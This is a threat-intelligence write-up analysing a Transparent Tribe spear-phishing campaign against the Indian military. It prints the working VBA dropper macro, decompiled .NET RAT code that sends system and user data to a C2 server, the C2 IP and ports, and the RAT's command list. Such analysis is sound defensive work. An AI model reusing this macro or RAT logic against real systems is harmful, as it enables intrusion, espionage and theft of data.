Skip to content

Latest commit

 

History

History
415 lines (384 loc) · 14.4 KB

File metadata and controls

415 lines (384 loc) · 14.4 KB

Not as so transparent

Table of Contents

Malware analysis

The initial vector is from a decoy document probably shared from a spear-phishing (a copy of the content can be viewed here), this document have two links for download additionals informations. The both maldoc , this uses a macro for extract and executes the PE file depends on the version of the operating system.
Sub unMoferzip(Fname As Variant, FileNameFolder As Variant)
 Dim FSO As Object
 Dim oApp As Object
 'Extract the files into the Destination folder
 Set oApp = CreateObject("Shell.Application")
 oApp.Namespace(FileNameFolder).CopyHere oApp.Namespace(Fname).items, &H4
End Sub

Sub MoferfileLdr()
 Dim path_Mofer_file As String
 Dim file_Mofer_name  As String
 Dim zip_Mofer_file  As Variant
 Dim fldr_Mofer_name  As Variant
 file_Mofer_name = "ulhtagnias"
 fldr_Mofer_name = Environ$("ALLUSERSPROFILE") & "\DeIA-WIR\"
 If Dir(fldr_Mofer_name, vbDirectory) = "" Then
  MkDir (fldr_Mofer_name)
 End If
 zip_Mofer_file = fldr_Mofer_name & file_Mofer_name & ".zip"
 path_Mofer_file = fldr_Mofer_name & file_Mofer_name & ".exe"
 Dim ar1Mofer() As String
 Dim btsMofer() As Byte
 If InStr(Application.System.Version, "6.2") > 0 Or InStr(Application.System.Version, "6.3") > 0 Then
  ar1Mofer = Split(UserForm1.TextBox2.Text, "'")
 Else
  ar1Mofer = Split(UserForm1.TextBox1.Text, "'")
 End If
 Dim linMofer As Double
 linMofer = 0
 For Each vl In ar1Mofer
  ReDim Preserve btsMofer(linMofer)
  btsMofer(linMofer) = CByte(vl)
  linMofer = linMofer + 1
 Next
  Open zip_Mofer_file For Binary Access Write As #2
   Put #2, , btsMofer
 Close #2
 If Len(Dir(path_Mofer_file)) = 0 Then
  Call unMoferzip(zip_Mofer_file, fldr_Mofer_name)
 End If
   Shell path_Mofer_file, vbNormalNoFocus
End Sub
The .NET implant begins to load the recon actions, push a timer for sleep the process and try to join the C2.
public void ulhtagniasdo_start()
{
 ulhtagniasCONF.ulhtagniasport = ulhtagniasCONF.ports[0];
 this.ulhtagniasrunTime = DateTime.Now;
 this.ulhtagniasUPC = new ulhtagniasMYINF();
 this.ulhtagniasCMD = new ulhtagniasOCMD(this);
 this.ulhtagniasHD.iserver = this;
 this.ulhtagniasHD.ulhtagniasmainPath = ulhtagniasCONF.ulhtagniasget_mpath();
 TimerCallback callback = new TimerCallback(this.ulhtagniaslookup_connect);
 System.Threading.Timer ulhtagniastimer = new System.Threading.Timer(callback, this.ulhtagniasStateObj, 32110, 36110);
 this.ulhtagniasStateObj.ulhtagniastimer = ulhtagniastimer;
}
Once the connexion is establish with the C2, this sends the informations of the user, system, sensible AV (who detect it easily) and this repertory (here from a trace of the TCP stream of an Anyrun sandbox)

.....info=command.....ulhtagnias-info=user8....|USER-PC|admin||6>1|S.P.1.3|| ||C:\ProgramData\DeIA-WIR\.....clping=Ping.....clping=Ping

private void ulhtagniasuser_info()
{
 string text = string.Concat(new string[]
 {
  this.ulhtagniasUPC.ulhtagniaslancard,"|",this.ulhtagniasUPC.ulhtagniascname,"|",
  this.ulhtagniasUPC.ulhtagniasuname,"|",this.ulhtagniasUPC.ulhtagniasuip,"|",
  ulhtagniasCONF.ulhtagniasOsname(),"|",this.ulhtagniasUPC.ulhtagniasapver,"|",
  ulhtagniasCONF.ulhtagniasloadAV()
 });
 text += "| !ulhtagnias".Split(new char[]{'!'})[0];
 text = text + "|" + this.ulhtagniasUPC.ulhtagniasclientNum;
 text = text + "|" + ulhtagniasCONF.ulhtagniasget_mpath();
 byte[] byteArray = ulhtagniasCONF.getByteArray(text);
 this.ulhtagniaspush_data(byteArray, "ulhtagnias-info=user|ulhtagnias".Split(new char[]{'|'})[0], false);
} 

public static string ulhtagniasOsname()
{
 string result;
 try
 {
  OperatingSystem osversion = Environment.OSVersion;
  result = osversion.Version.Major.ToString() + ">" + osversion.Version.Minor.ToString();
 }
 catch {result = "6>1!ulhtagnias".Split(new char[]{'!'})[0];}
 return result;
}
The name of PE file is used as identifier and the command by a couple {nameimplant-command}.This can perform the actions by the following commands :

Command Description
-procl Get the list of process
-thumb Get info of a picture
-clping Check activity
-putsrt Push the persistence in a Run key
-filsz Get infos of a specific file
-rupth Push the data received
-dowf Save to a file the data pushed on the system
-endpo Kill a process
-scrsz Get the size of the screen
-cownar Download and run a executable file
-cscreen Get a screenshot
-dirs List all the drives and directories
-stops stop the mod for get periodical screenshot
-scren start the mod for get periodical screenshot
-cnls Allow index, send data and disable continue screenshot
-udlt Download and execute an executable for remove an user ?
-delt Delete a specific file
-listf List files
-file Get a specific file
-info Get user and system infos, check if the AV is on blacklist
-runf Execute a specific file
-dowr Download a file on the system
-fldr Get folders and go silent mod

On the RAT, one of two byte array is used for triggering the detection of a sensible AV.
public static byte[] encAvs = new byte[]{98,100,115,115,61,66,105,116,32,68,101,102,101,110,100,101,114,44,111,110,108,105,110,101,110,116,61,81,46,72,101,97,108,44,98,100,97,103,101,110,116,61,66,105,116,32,68,101,102,101,110,100,101,114,32,65,103,101,110,116,44,109,115,115,101,99,101,115,61,77,83,32,69,115,115,101,110,116,105,97,108,115,44,102,115,115,109,51,50,61,70,83,101,99,117,114,101,44,97,118,112,61,75,97,115,112,101,114,115,107,121,44,97,118,103,110,116,61,65,118,105,114,97,44,115,112,98,98,99,115,118,99,61,83,121,109,97,110,116,101,99,44,117,112,100,97,116,101,114,117,105,61,77,99,65,102,101,101,44,97,118,103,117,105,61,65,86,71,44,97,118,103,99,99,61,65,86,71,44,109,98,97,109,61,65,110,116,32,77,97,108,119,97,114,101,44,97,118,97,115,116,117,105,61,65,118,97,115,116,44,97,118,97,115,116,61,65,118,97,115,116};
This can be easily viewable in an oneliner (UTF8 + Getstring) and show the list of sensible AV to detect.
PS> ([System.Text.Encoding]::UTF8.GetString($encAvs)).split(",")
bdss=Bit Defender
onlinent=Q.Heal
bdagent=Bit Defender Agent
msseces=MS Essentials     
fssm32=FSecure
avp=Kaspersky
avgnt=Avira
spbbcsvc=Symantec
updaterui=McAfee
avgui=AVG
avgcc=AVG
mbam=Ant Malware
avastui=Avast
avast=Avast 
With the same logic, we can get the content of the second array which get the IP of the C2 to contact.
PS> ([System.Text.Encoding]::UTF8.GetString($tab)).split(",")   
198.46.177.73
Some identifiers like the name of user, default IP and logname can be found.
public static string ulhtagniasmainApp = "ulhtagnias|ulhtagnias".Split(new char[]{'|'})[0];
public static string ulhtagniaspc_id = "vhldsp|ulhtagnias".Split(new char[]{'|'})[0];
public static string ulhtagniasremvUser = "drlarmn|ulhtagnias".Split(new char[]{'|'})[0];
public static string ulhtagniasfilesLogs = "rndlbes".Split(new char[]{'|'})[0];}
public static string ulhtagniasdefaultP = "122.200.110.101|ulhtagnias".Split(new char[]{'|'})[0];
This connects on the default port (6421) and can switch depending on the needs of the operations.
public static int[] ports = new int[]{6421,4920,10422,14823,16824};
public void ulhtagniasports_switch()
 {
  try
  {
   this.port_sn++;
   ulhtagniasCONF.ulhtagniasport = ulhtagniasCONF.ports[this.port_sn];
   if (this.port_sn >= ulhtagniasCONF.ports.Length - 1){this.port_sn = 0;}
  }
 catch{this.port_sn = 0;}
 }
Addionnal informations :
  • ulhtagnias.exe
  • pdb path g:\ulhtagnias\ulhtagnias\obj\Debug\ulhtagnias.pdb
    Compilation time 2020-01-09 21:21:34

  • Special Benefits.docx
  • Creator Dell-R
    Last Modified By Bipin
    Creation date 2020-01-15 10:02:00
    Last Modified Date 2020-01-17 04:41:00
    Software used Microsoft Office Word 12.0 (2007)

  • Criteria of Army Officers.doc
  • Creator Bipin
    Last Modified By Bipin
    Creation date 2020-01-12 07:14:43
    Last Modified Date 2020-01-12 07:14:43
    Software used Microsoft Office Word 12.0 (2007)

  • 7All Selected list.xls
  • Creator
    Last Modified By
    Creation date 2020-01-12 07:04:53
    Last Modified Date 2020-01-12 07:08:59
    Software used Microsoft Office Word 12.0 (2007)

Several interesting things are to be reported. Firstly, the NET implant was designed first for the event, secondly, the maldoc are planned before the idea of the decoy document to download them. The Bipin account often comes up in Transparent Tribe campaigns, possibly it is responsible for the development of malicious tools, in this logic the other "Dell-R" account would be responsible for the templates of the decoys.The fact that the document is delivered after the celebration is not a problem in the logic that it should be given as a reward after the event, so the team could hang longer than if it would have an announcement related only to the day of the event.

Threat Intelligence

This operation uses the recent event of the 72nd year of the independence of the Indian armed forces. The Transparent Tribe group specializes in its field of attack in the Indian armed forces.

The main purpose of this operation isn't to obtain more information from arms tests since the lasts month by the various Indian armed groups but, first of all, to collect identities and credentials to conduct more extensive operations.

Cyber kill chain

This process graph represent the cyber kill chain of the maldoc vector.

Indicators Of Compromise (IOC)

List of all the Indicators Of Compromise (IOC)
Indicator Description
Special Benefits.docx 6c9c6966ce269bbcab164aca3c3f0231af1f7b26a18e5abc927b2ccdd9499368
Criteria of Army Officers.doc 1cb726eab6f36af73e6b0ed97223d8f063f8209d2c25bed39f010b4043b2b8a1
7All Selected list.xls 2aa160726037e80384672e89968ab4d2bd3b7f5ca3dfa1b9c1ecc4d1647a63f0
ulhtagnias.exe d2c46e066ff7802cecfcb7cf3bab16e63827c326b051dc61452b896a673a6e67
198.46.177.73 IP C2
The IOC can be exported in JSON

References MITRE ATT&CK Matrix

Enterprise tactics Technics used Ref URL
Discovery Query Registry https://attack.mitre.org/techniques/T1012/
C&C Uncommonly Used Port https://attack.mitre.org/techniques/T1065/
Defense Evasion Scripting https://attack.mitre.org/techniques/T1064/
Execution Scripting https://attack.mitre.org/techniques/T1064/
This can be exported as JSON format Export in JSON

Yara Rules

A list of YARA Rule is available here

Links

Original tweet:
Links Anyrun:
Resources :